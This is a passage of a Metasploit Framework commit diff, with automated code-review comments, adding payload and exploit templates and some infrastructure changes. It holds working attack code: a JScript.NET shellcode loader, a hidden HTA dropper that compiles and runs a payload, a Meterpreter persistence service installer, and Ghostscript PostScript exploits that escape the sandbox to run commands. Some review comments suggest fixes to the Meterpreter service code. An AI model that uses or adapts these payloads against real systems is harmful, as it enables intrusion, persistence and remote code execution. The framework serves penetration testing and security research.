return realType.InvokeMember(methodName, BindingFlags.Public + BindingFlags.Static + BindingFlags.InvokeMethod, null, null, parameters);
|
||||
}
|
||||
|
||||
function VirtualAlloc( lpStartAddr:UInt32, size:UInt32, flAllocationType:UInt32, flProtect:UInt32)
|
||||
{
|
||||
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32")];
|
||||
var parameters:Object[] = [lpStartAddr, size, flAllocationType, flProtect];
|
||||
|
||||
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "VirtualAlloc", parameterTypes, parameters );
|
||||
}
|
||||
|
||||
function CreateThread( lpThreadAttributes:UInt32, dwStackSize:UInt32, lpStartAddress:IntPtr, param:IntPtr, dwCreationFlags:UInt32, lpThreadId:UInt32)
|
||||
{
|
||||
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.IntPtr"),Type.GetType("System.IntPtr"), Type.GetType("System.UInt32"), Type.GetType("System.UInt32") ];
|
||||
var parameters:Object[] = [lpThreadAttributes, dwStackSize, lpStartAddress, param, dwCreationFlags, lpThreadId ];
|
||||
|
||||
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "CreateThread", parameterTypes, parameters );
|
||||
}
|
||||
|
||||
function WaitForSingleObject( handle:IntPtr, dwMiliseconds:UInt32)
|
||||
{
|
||||
var parameterTypes:Type[] = [Type.GetType("System.IntPtr"),Type.GetType("System.UInt32")];
|
||||
var parameters:Object[] = [handle, dwMiliseconds ];
|
||||
|
||||
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "WaitForSingleObject", parameterTypes, parameters );
|
||||
}
|
||||
|
||||
function ShellCodeExec()
|
||||
{
|
||||
var MEM_COMMIT:uint = 0x1000;
|
||||
var PAGE_EXECUTE_READWRITE:uint = 0x40;
|
||||
|
||||
var shellcodestr:String = '<%= file_payload %>'
|
||||
var shellcode:Byte[] = System.Convert.FromBase64String(shellcodestr);
|
||||
var funcAddr:IntPtr = VirtualAlloc(0, UInt32(shellcode.Length),MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
|
||||
Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);
|
||||
var hThread:IntPtr = IntPtr.Zero;
|
||||
var threadId:UInt32 = 0;
|
||||
// prepare data
|
||||
var pinfo:IntPtr = IntPtr.Zero;
|
||||
// execute native code
|
||||
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, threadId);
|
||||
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||
|
||||
}
|
||||
try{
|
||||
ShellCodeExec();
|
||||
}catch(e){}
|
|
@ -0,0 +1,9 @@
|
|||
%!PS
|
||||
userdict /setpagedevice undef
|
||||
a0
|
||||
currentpagedevice /HWResolution get 0 (metasploit) put
|
||||
{ grestore } stopped pop
|
||||
(ppmraw) selectdevice
|
||||
mark /OutputFile (%pipe%echo vulnerable > /dev/tty) currentdevice putdeviceprops
|
||||
{ showpage } stopped pop
|
||||
quit
|
|
@ -0,0 +1,81 @@
|
|||
%!PS
|
||||
% This is ghostscript bug #699687 (split out from bug #699654)
|
||||
|
||||
% ImageMagick define setpagedevice, just remove their definition. This doesn't
|
||||
% do anything if not using ImageMagick.
|
||||
userdict /setpagedevice undef
|
||||
|
||||
% function to check if we're on Linux or Windows
|
||||
/iswindows {
|
||||
% Just checking if paths contain drive
|
||||
null (w) .tempfile closefile 1 get 16#3A eq
|
||||
} def
|
||||
|
||||
% just select a papersize to initialize page device
|
||||
a0
|
||||
|
||||
% The bug is that if you can make grestore or restore fail non-fatally,
|
||||
% LockSafetyParams isn't restored properly. grestore will fail if you set crazy
|
||||
% properties in your pagedevice, like a nonsense resolution.
|
||||
%
|
||||
% Normally it would be something like [72.0 72.0], but you can't just def
|
||||
% HWResolution to something else (for example), because it's readonly:
|
||||
%
|
||||
% GS>currentpagedevice wcheck ==
|
||||
% false
|
||||
%
|
||||
% But you can just put or astore into it, because the array itself is writable:
|
||||
% GS>currentpagedevice /HWResolution get wcheck ==
|
||||
% true
|
||||
%
|
||||
% Lets just put some junk in there.
|
||||
currentpagedevice /HWResolution get 0 (foobar) put
|
||||
|
||||
% This grestore will fail, stopped just catches the error instead of aborting.
|
||||
{ grestore } stopped pop
|
||||
|
||||
% Now LockSafetyParams will be incorrectly unset, you can check like this:
|
||||
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
|
||||
% false
|
||||
|
||||
% We can change and configure devices now, so make sure we're using one with
|
||||
% a OutputFile property.
|
||||
(ppmraw) selectdevice
|
||||
|
||||
% Check if we're on Windows or UNIX
|
||||
iswindows {
|
||||
% This is Windows, gswin32c.exe supports %pipe%, so you can just run calc.exe.
|
||||
%
|
||||
% The graphical version doesn't seem to support %pipe%, but you can create
|
||||
% arbitrary files. If something is using the api (gs32dll.dll), it may or
|
||||
% may not support %pipe%.
|
||||
|
||||
/getstartupdirwindows {
|
||||
% This figures out startup location from %TEMP% (Tested on Win10)
|
||||
(C:\\USERS\\XXXXXX~1\\STARTM~1\\PROGRAMS\\STARTUP\\)
|
||||
dup 0 null (w) .tempfile closefile 0 18 getinterval putinterval
|
||||
} def
|
||||
|
||||
% (directory) (extension) randfile (result)
|
||||
/randfile {
|
||||
% pick a random filename
|
||||
exch rand 32 string cvs concatstrings exch concatstrings
|
||||
} def
|
||||
|
||||
mark /OutputFile (%pipe%calc.exe) currentdevice putdeviceprops
|
||||
|
||||
% if you need to create files, use txtwrite like this:
|
||||
|
||||
%mark /OutputFile getstartupdirwindows (.bat) randfile
|
||||
% { (txtwrite) selectdevice } stopped pop putdeviceprops setdevice
|
||||
%0 0 moveto
|
||||
%(REM This is an exploit demo\n) show
|
||||
%(calc.exe\n) show
|
||||
} {
|
||||
% This is UNIX, just run a shell command
|
||||
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
|
||||
} ifelse
|
||||
|
||||
{ showpage } stopped pop
|
||||
|
||||
quit
|
|
@ -0,0 +1,151 @@
|
|||
<html>
|
||||
<head>
|
||||
<HTA:APPLICATION WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
|
||||
</head>
|
||||
</html>
|
||||
<script>
|
||||
window.resizeTo(1, 1);
|
||||
window.moveTo(-2000, -2000);
|
||||
// Base64 implementation found on http://www.webtoolkit.info/javascript-base64.html
|
||||
// variable names changed to make obfuscation easier
|
||||
var Base64 = {
|
||||
// private property
|
||||
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
|
||||
|
||||
// public method for decoding
|
||||
decode : function (input) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3;
|
||||
var enc1, enc2, enc3, enc4;
|
||||
var i = 0;
|
||||
|
||||
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
|
||||
|
||||
while (i < input.length) {
|
||||
|
||||
enc1 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc2 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc3 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc4 = this._keyStr.indexOf(input.charAt(i++));
|
||||
|
||||
chr1 = (enc1 << 2) | (enc2 >> 4);
|
||||
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
|
||||
chr3 = ((enc3 & 3) << 6) | enc4;
|
||||
|
||||
output = output + String.fromCharCode(chr1);
|
||||
|
||||
if (enc3 != 64) {
|
||||
output = output + String.fromCharCode(chr2);
|
||||
}
|
||||
if (enc4 != 64) {
|
||||
output = output + String.fromCharCode(chr3);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
output = Base64._utf8_decode(output);
|
||||
|
||||
return output;
|
||||
|
||||
},
|
||||
_utf8_decode : function (utftext) {
|
||||
var string = "";
|
||||
var input_idx = 0;
|
||||
var chr1 = 0;
|
||||
var chr2 = 0;
|
||||
var chr3 = 0;
|
||||
|
||||
while ( input_idx < utftext.length ) {
|
||||
|
||||
chr1 = utftext.charCodeAt(input_idx);
|
||||
|
||||
if (chr1 < 128) {
|
||||
string += String.fromCharCode(chr1);
|
||||
input_idx++;
|
||||
}
|
||||
else if((chr1 > 191) && (chr1 < 224)) {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
|
||||
input_idx += 2;
|
||||
} else {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
chr3 = utftext.charCodeAt(input_idx+2);
|
||||
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
|
||||
input_idx += 3;
|
||||
}
|
||||
}
|
||||
|
||||
return string;
|
||||
}
|
||||
|
||||
};
|
||||
|
||||
decodedStr = Base64.decode("<%= jsnet_encoded %>");
|
||||
|
||||
function getTempPath()
|
||||
{
|
||||
var TemporaryFolder = 2;
|
||||
|
||||
var fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var tempPath = fso.GetSpecialFolder(TemporaryFolder);
|
||||
|
||||
return tempPath;
|
||||
}
|
||||
|
||||
var path = getTempPath();
|
||||
|
||||
function makefile()
|
||||
{
|
||||
var fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var thefile = fso.CreateTextFile(path + "\\\\<%= fname %>.js", true);
|
||||
|
||||
thefile.WriteLine(decodedStr);
|
||||
thefile.Close();
|
||||
}
|
||||
|
||||
makefile();
|
||||
|
||||
function findJSC()
|
||||
{
|
||||
var fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var comPath = "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\";
|
||||
var jscPath = "";
|
||||
|
||||
if(!fso.FolderExists(comPath))
|
||||
{
|
||||
return false;
|
||||
}
|
||||
|
||||
var frameFolder = fso.GetFolder(comPath);
|
||||
var fEnum = new Enumerator(frameFolder.SubFolders);
|
||||
|
||||
while(!fEnum.atEnd())
|
||||
{
|
||||
jscPath = fEnum.item().Path;
|
||||
|
||||
if(fso.FileExists(jscPath + "\\\\jsc.exe"))
|
||||
{
|
||||
return jscPath + "\\\\jsc.exe";
|
||||
}
|
||||
|
||||
fEnum.moveNext();
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
var comPath = findJSC();
|
||||
if(comPath)
|
||||
{
|
||||
var fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var objShell = new ActiveXObject("WScript.shell");
|
||||
var js_f = path + "\\\\<%= fname %>.js";
|
||||
var ex = path + "\\\\<%= fname %>.exe";
|
||||
var platform = "/platform:<%= arch %>";
|
||||
|
||||
objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
|
||||
while(!fso.FileExists(ex)) { }
|
||||
|
||||
objShell.run(ex, 0);
|
||||
}
|
||||
</script>
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,304 @@
|
|||
#include <String.h>
|
||||
#include <Windows.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define SERVICE_NAME <%= @service_name.inspect %>
|
||||
#define DISPLAY_NAME <%= @service_description.inspect %>
|
||||
#define RETRY_TIME <%= @retry_time %>
|
||||
|
||||
//
|
||||
// Globals
|
||||
//
|
||||
|
||||
SERVICE_STATUS status;
|
||||
SERVICE_STATUS_HANDLE hStatus;
|
||||
|
||||
//
|
||||
// Meterpreter connect back to host
|
||||
//
|
||||
|
||||
void start_meterpreter()
|
||||
{
|
||||
// Your meterpreter shell here
|
||||
<%= buf %>
|
||||
|
||||
LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
memcpy(buffer,buf,sizeof(buf));
|
||||
HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
|
||||
WaitForSingleObject(hThread, -1); //INFINITE
|
||||
CloseHandle(hThread);
|
||||
}
|
||||
|
||||
//
|
||||
// Call self without parameter to start meterpreter
|
||||
//
|
||||
|
||||
void self_call()
|
||||
{
|
||||
char path[MAX_PATH];
|
||||
char cmd[MAX_PATH];
|
||||
|
||||
if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
|
||||
// Get module file name failed
|
||||
return;
|
||||
}
|
||||
|
||||
STARTUPINFO startup_info;
|
||||
PROCESS_INFORMATION process_information;
|
||||
|
||||
ZeroMemory(&startup_info, sizeof(startup_info));
|
||||
startup_info.cb = sizeof(startup_info);
|
||||
|
||||
ZeroMemory(&process_information, sizeof(process_information));
|
||||
|
||||
// If create process failed.
|
||||
// CREATE_NO_WINDOW = 0x08000000
|
||||
if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
|
||||
NULL, &startup_info, &process_information) == 0)
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
// Wait until the process died.
|
||||
WaitForSingleObject(process_information.hProcess, -1);
|
||||
}
|
||||
|
||||
//
|
||||
// Process control requests from the Service Control Manager
|
||||
//
|
||||
|
||||
VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
|
||||
{
|
||||
switch (fdwControl) {
|
||||
case SERVICE_CONTROL_STOP:
|
||||
case SERVICE_CONTROL_SHUTDOWN:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_STOPPED;
|
||||
break;
|
||||
|
||||
case SERVICE_CONTROL_PAUSE:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_PAUSED;
|
||||
break;
|
||||
|
||||
case SERVICE_CONTROL_CONTINUE:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_RUNNING;
|
||||
break;
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
if (SetServiceStatus(hStatus, &status) == 0) {
|
||||
//printf("Cannot set service status (0x%08x)", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Main function of service
|
||||
//
|
||||
|
||||
VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
|
||||
{
|
||||
// Register the service handler
|
||||
|
||||
hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
|
||||
|
||||
if (hStatus == 0) {
|
||||
//printf("Cannot register service handler (0x%08x)", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Initialize the service status structure
|
||||
|
||||
status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
|
||||
status.dwCurrentState = SERVICE_RUNNING;
|
||||
status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwServiceSpecificExitCode = 0;
|
||||
status.dwCheckPoint = 0;
|
||||
status.dwWaitHint = 0;
|
||||
|
||||
if (SetServiceStatus(hStatus, &status) == 0) {
|
||||
//printf("Cannot set service status (0x%08x)", GetLastError());
|
||||
return;
|
||||
}
|
||||
|
||||
// Start the Meterpreter
|
||||
while (status.dwCurrentState == SERVICE_RUNNING) {
|
||||
self_call();
|
||||
Sleep(RETRY_TIME);
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Installs and starts the Meterpreter service
|
||||
//
|
||||
|
||||
BOOL install_service()
|
||||
{
|
||||
SC_HANDLE hSCManager;
|
||||
SC_HANDLE hService;
|
||||
|
||||
char path[MAX_PATH];
|
||||
|
||||
// Get the current module name
|
||||
|
||||
if (!GetModuleFileName(NULL, path, MAX_PATH)) {
|
||||
//printf("Cannot get module name (0x%08x)", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Build the service command line
|
||||
|
||||
|
||||
char cmd[MAX_PATH];
|
||||
|
||||
int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
|
||||
if (total_len < 0 || total_len >= sizeof(cmd)){
|
||||
//printf("Cannot build service command line (0x%08x)", -1);
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
cmd[0] = '\0';
|
||||
strcat(cmd, "\"");
|
||||
strcat(cmd, path);
|
||||
strcat(cmd, "\" <%= @start_cmd %>");
|
||||
|
||||
// Open the service manager
|
||||
|
||||
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
|
||||
|
||||
if (hSCManager == NULL) {
|
||||
//printf("Cannot open service manager (0x%08x)", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Create the service
|
||||
|
||||
hService = CreateService(
|
||||
hSCManager,
|
||||
SERVICE_NAME,
|
||||
DISPLAY_NAME,
|
||||
0xf01ff, // SERVICE_ALL_ACCESS
|
||||
SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
|
||||
SERVICE_AUTO_START,
|
||||
SERVICE_ERROR_NORMAL,
|
||||
cmd,
|
||||
NULL,
|
||||
NULL,
|
||||
NULL,
|
||||
NULL, /* LocalSystem account */
|
||||
NULL
|
||||
);
|
||||
|
||||
if (hService == NULL) {
|
||||
//printf("Cannot create service (0x%08x)", GetLastError());
|
||||
|
||||
CloseServiceHandle(hSCManager);
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Start the service
|
||||
|
||||
char* args[] = { path, "service" };
|
||||
|
||||
if (StartService(hService, 2, (const char**)&args) == 0) {
|
||||
DWORD err = GetLastError();
|
||||
|
||||
if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
|
||||
{
|
||||
//printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCManager);
|
||||
return FALSE;
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCManager);
|
||||
|
||||
//printf("Service %s successfully installed.", SERVICE_NAME);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
//
|
||||
// Start the service
|
||||
//
|
||||
|
||||
void start_service()
|
||||
{
|
||||
SERVICE_TABLE_ENTRY ServiceTable[] =
|
||||
{
|
||||
{ SERVICE_NAME, &ServiceMain },
|
||||
{ NULL, NULL }
|
||||
};
|
||||
|
||||
if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
|
||||
//printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Main function
|
||||
//
|
||||
|
||||
int main()
|
||||
{
|
||||
// Parse the command line argument.
|
||||
// For now, int main(int argc, char *argv) is buggy with metasm.
|
||||
// So we choose this approach to achieve it.
|
||||
LPTSTR cmdline;
|
||||
cmdline = GetCommandLine();
|
||||
|
||||
char *argv[MAX_PATH];
|
||||
char * ch = strtok(cmdline," ");
|
||||
int argc = 0;
|
||||
|
||||
while (ch != NULL)
|
||||
{
|
||||
argv[argc] = malloc( strlen(ch)+1) ;
|
||||
strncpy(argv[argc], ch, strlen(ch)+1);
|
||||
|
||||
ch = strtok (NULL, " ");
|
||||
argc++;
|
||||
}
|
||||
|
||||
if (argc > 1) {
|
||||
|
||||
if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
|
||||
|
||||
// Installs and starts the service
|
||||
|
||||
install_service();
|
||||
return 0;
|
||||
}
|
||||
else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
|
||||
// Starts the Meterpreter as a service
|
||||
|
||||
start_service();
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
|
||||
// Starts the Meterpreter as a normal application
|
||||
|
||||
start_meterpreter();
|
||||
|
||||
return 0;
|
||||
}
|
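Review bot: The tokenizing loop in `main` never bounds `argc`, so a command line with more than MAX_PATH whitespace-separated tokens writes past the `char *argv[MAX_PATH]` stack array; the condition should be `while (ch != NULL && argc < MAX_PATH)`. `self_call` also never closes the handles `CreateProcess` returns, so every pass of the retry loop in `ServiceMain` leaks `process_information.hProcess` and `.hThread`; add `CloseHandle(process_information.hProcess); CloseHandle(process_information.hThread);` after the `WaitForSingleObject`. The `char cmd[MAX_PATH]` declared in `self_call` is never used. This is an ERB template, so the `<%= %>` expressions only become C once rendered and the C-level review applies to the rendered output.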
Binary file not shown.
Binary file not shown.
|
@ -252,6 +252,16 @@ typedef struct _OVERLAPPED {
|
|||
} OVERLAPPED, *LPOVERLAPPED;
|
||||
|
||||
typedef DWORD SERVICE_STATUS_HANDLE;
|
||||
typedef VOID(WINAPI *LPHANDLER_FUNCTION)(DWORD);
|
||||
|
||||
typedef void (WINAPI *LPSERVICE_MAIN_FUNCTION)(DWORD,LPSTR*);
|
||||
|
||||
typedef struct _SERVICE_TABLE_ENTRY {
|
||||
LPSTR lpServiceName;
|
||||
LPSERVICE_MAIN_FUNCTION lpServiceProc;
|
||||
} SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
|
||||
|
||||
typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
|
||||
|
||||
typedef enum _SC_ENUM_TYPE {
|
||||
SC_ENUM_PROCESS_INFO = 0
|
||||
|
@ -540,3 +550,6 @@ WINAPI BOOL IsDebuggerPresent __attribute__((dllimport))(void);
|
|||
WINAPI BOOL CheckRemoteDebuggerPresent __attribute__((dllimport))(HANDLE, PBOOL);
|
||||
WINAPI NTSTATUS NtQueryInformationProcess __attribute__((dllimport))(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
|
||||
WINAPI void SetLastError __attribute__((dllimport))(DWORD);
|
||||
WINAPI SERVICE_STATUS_HANDLE RegisterServiceCtrlHandler __attribute__((dllimport))(LPCSTR, LPHANDLER_FUNCTION);
|
||||
BOOL WINAPI StartServiceCtrlDispatcher __attribute__((dllimport))(LPSERVICE_TABLE_ENTRY);
|
||||
LPTSTR WINAPI GetCommandLine __attribute__((dllimport))(void);
|
||||
|
|
|
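Review bot: The line `typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;` redeclares the two names that the struct typedef immediately above already introduces, so it is redundant and, depending on how strictly the metasm C parser treats typedef redefinition (only C11 permits it, and only for an identical type), may be rejected; drop that line. Separately, `typedef DWORD SERVICE_STATUS_HANDLE;` models a handle as a 32-bit integer, which matches pointer size only on x86 — if this header were ever used for an x64 build the handle would be truncated, so a comment such as `/* x86 only: handle is pointer-sized on x64 */` is worth adding. The prototype `LPTSTR WINAPI GetCommandLine` puts the calling convention after the return type while the neighbouring declarations put `WINAPI` first; pick one order.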
@ -44,3 +44,5 @@ int system(const char*);
|
|||
long int labs(long int);
|
||||
div_t div(int, int);
|
||||
ldiv_t ldiv(long int, long int);
|
||||
void* malloc (size_t size);
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|
||||
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V5%clr |
|
||||
|______________________________________________________________________________|
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr . %yel/%clr %yel/%clr x
|
||||
|
@ -25,6 +25,6 @@
|
|||
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
|
||||
################################################################################
|
||||
################################################################################
|
||||
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
# %bldWAVE 5%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
################################################################################
|
||||
https://metasploit.com%clr
|
||||
|
|
|
@ -14,10 +14,22 @@
|
|||
<%= normalize_platforms(items[:mod_platforms]) %>
|
||||
<% end %>
|
||||
|
||||
## Reliability
|
||||
## Module Ranking
|
||||
|
||||
<%= normalize_rank(items[:mod_rank]) %>
|
||||
|
||||
## Side Effects
|
||||
|
||||
<%= normalize_side_effects(items[:mod_side_effects]) %>
|
||||
|
||||
## Reliability
|
||||
|
||||
<%= normalize_reliability(items[:mod_reliability]) %>
|
||||
|
||||
## Stability
|
||||
|
||||
<%= normalize_stability(items[:mod_stability]) %>
|
||||
|
||||
## Related Pull Requests
|
||||
|
||||
<%= normalize_pull_requests(items[:mod_pull_requests]) %>
|
||||
|
|
|
@ -0,0 +1,6 @@
|
|||
```
|
||||
msf > use <%= mod.fullname %>
|
||||
msf <%= mod.type %>(<%= mod.shortname %>) > show options
|
||||
... show and set options ...
|
||||
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
|
||||
```
|
|
@ -86241,6 +86241,7 @@ wharves
|
|||
what
|
||||
whatchamacallit
|
||||
whatever
|
||||
whatevers2009
|
||||
whatley
|
||||
whatnot
|
||||
whatshername
|
||||
|
|
|
@ -16,6 +16,7 @@ bin
|
|||
checkfs
|
||||
checkfsys
|
||||
checksys
|
||||
chronos
|
||||
cmwlogin
|
||||
couchdb
|
||||
daemon
|
||||
|
|
|
@ -9,6 +9,6 @@ services:
|
|||
BUNDLER_ARGS: --jobs=8
|
||||
image: metasploit:dev
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
|
||||
volumes:
|
||||
- .:/usr/src/metasploit-framework
|
||||
|
|
|
@ -3,14 +3,13 @@ services:
|
|||
ms:
|
||||
image: metasploitframework/metasploit-framework:latest
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
|
||||
links:
|
||||
- db
|
||||
ports:
|
||||
- 4444:4444
|
||||
volumes:
|
||||
- $HOME/.msf4:/home/msf/.msf4
|
||||
- /etc/localtime:/etc/localtime:ro
|
||||
|
||||
db:
|
||||
image: postgres:10-alpine
|
||||
|
|
|
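Review bot: `pool=200` on `DATABASE_URL` lets ActiveRecord open up to 200 connections to the `postgres:10-alpine` service, whose default `max_connections` is 100, so under load checkouts beyond the server limit fail with a "too many clients" error instead of queuing; either lower the pool or raise the server limit on the `db` service, e.g. `command: postgres -c max_connections=200`. The same `pool=200` is set in the dev compose file in the section above, where the `db` image is not visible in this view, so the same check applies there.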
@ -0,0 +1,5 @@
|
|||
development: &pgsql
|
||||
url: <%= ENV['DATABASE_URL'] %>
|
||||
|
||||
production: &production
|
||||
<<: *pgsql
|
|
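Review bot: `url: <%= ENV['DATABASE_URL'] %>` renders as an empty `url:` when the variable is unset, which only surfaces later as a confusing adapter error; `<%= ENV.fetch('DATABASE_URL') %>` fails at load time with a KeyError naming the missing variable. Since `production` only merges the `pgsql` anchor, the same applies to both environments.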
@ -5,16 +5,27 @@ MSF_GROUP=msf
|
|||
TMP=${MSF_UID:=1000}
|
||||
TMP=${MSF_GID:=1000}
|
||||
|
||||
# don't recreate system users like root
|
||||
if [ "$MSF_UID" -lt "1000" ]; then
|
||||
MSF_UID=1000
|
||||
# if the user starts the container as root or another system user,
|
||||
# don't use a low privileged user as we mount the home directory
|
||||
if [ "$MSF_UID" -eq "0" ]; then
|
||||
"$@"
|
||||
else
|
||||
# if the users group already exists, create a random GID, otherwise
|
||||
# reuse it
|
||||
if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
else
|
||||
addgroup $MSF_GROUP
|
||||
fi
|
||||
|
||||
# check if user id already exists
|
||||
if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
# add user to metasploit group so it can read the source
|
||||
addgroup $MSF_USER $METASPLOIT_GROUP
|
||||
su-exec $MSF_USER "$@"
|
||||
# fall back to root exec if the user id already exists
|
||||
else
|
||||
"$@"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ "$MSF_GID" -lt "1000" ]; then
|
||||
MSF_GID=1000
|
||||
fi
|
||||
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
|
||||
su-exec $MSF_USER "$@"
|
||||
|
|
|
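Review bot: The new fallback branch runs the command as root whenever `$MSF_UID` already appears in /etc/passwd — which, now that the old `-lt 1000` clamp is gone, includes any system UID a caller passes — so an id collision silently keeps root instead of dropping privileges; `su-exec` accepts numeric ids, so that branch can be `exec su-exec "$MSF_UID" "$@"` instead of `"$@"`. None of the three launch lines uses `exec`, so the shell stays PID 1 and the SIGTERM from `docker stop` is not delivered to the framework process; make them `exec "$@"` and `exec su-exec $MSF_USER "$@"`. The `grep ":$MSF_UID:"` and `grep ":$MSF_GID:"` tests also match the id as a substring of any colon-delimited field rather than the uid/gid column (`cut -d: -f3 /etc/passwd | grep -qx "$MSF_UID"` is exact), and the comment "as root or another system user" promises more than the `-eq "0"` check actually covers.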
@ -0,0 +1,66 @@
|
|||
require 'swagger/blocks'
|
||||
|
||||
module AuthApiDoc
|
||||
include Swagger::Blocks
|
||||
|
||||
MESSAGE_DESC = 'The status of the authentication request.'
|
||||
MESSAGE_EXAMPLE = 'Generated new API token.'
|
||||
TOKEN_DESC = 'The Authentication Bearer token'
|
||||
